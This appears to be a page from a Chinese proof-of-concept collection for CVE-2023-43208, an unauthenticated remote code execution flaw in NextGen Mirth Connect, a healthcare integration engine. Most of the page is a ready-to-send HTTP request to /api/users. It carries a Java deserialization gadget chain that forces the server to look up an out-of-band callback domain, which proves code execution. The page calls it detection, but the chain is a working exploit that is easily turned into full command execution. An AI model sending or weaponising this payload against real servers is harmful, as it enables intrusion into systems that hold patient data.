POC详情: ae860ae266bc031441d91d5f00f0da3f02f8b0ea

来源
关联漏洞
标题: NextGen Mirth Connect 安全漏洞 (CVE-2023-43208)
描述:NextGen Mirth Connect是美国NextGen公司的一个医疗集成引擎。 NextGen Mirth Connect 4.4.1之前版本存在安全漏洞,该漏洞源于容易受到未经身份验证的远程代码执行攻击。
描述
Use java.net.InetAddress for detection
介绍
# CVE-2023-43208_Detection_PoC
Use java.net.InetAddress for detection

```txt
POST /api/users HTTP/1.1
Host: ip:8443
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: keep-alive
Content-Length: 1964
Content-Type: application/xml
X-Requested-With: OpenAPI
Accept-Encoding: gzip, deflate, br

<sorted-set>
    <string>ABCD</string>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
        <target class="org.apache.commons.collections4.functors.ChainedTransformer">
          <iTransformers>
            <org.apache.commons.collections4.functors.ConstantTransformer>
              <iConstant class="java-class">java.net.InetAddress</iConstant>
            </org.apache.commons.collections4.functors.ConstantTransformer>
            <org.apache.commons.collections4.functors.InvokerTransformer>
              <iMethodName>getMethod</iMethodName>
              <iParamTypes>
                <java-class>java.lang.String</java-class>
                <java-class>[Ljava.lang.Class;</java-class>
              </iParamTypes>
              <iArgs>
                <string>getAllByName</string>
                <java-class-array>
                  <java-class>java.lang.String</java-class>
                </java-class-array>
              </iArgs>
            </org.apache.commons.collections4.functors.InvokerTransformer>
            <org.apache.commons.collections4.functors.InvokerTransformer>
              <iMethodName>invoke</iMethodName>
              <iParamTypes>
                <java-class>java.lang.Object</java-class>
                <java-class>[Ljava.lang.Object;</java-class>
              </iParamTypes>
              <iArgs>
                <null/>
                <object-array>
                  <string>XXXXXXXXXXXXXXXXXXXXXXXXXXXXX.oast.fun</string>
                </object-array>
              </iArgs>
            </org.apache.commons.collections4.functors.InvokerTransformer>
          </iTransformers>
        </target>
        <methodName>transform</methodName>
        <eventTypes>
          <string>compareTo</string>
        </eventTypes>
      </handler>
    </dynamic-proxy>
</sorted-set>

```
文件快照

[4.0K] /data/pocs/ae860ae266bc031441d91d5f00f0da3f02f8b0ea └── [2.3K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。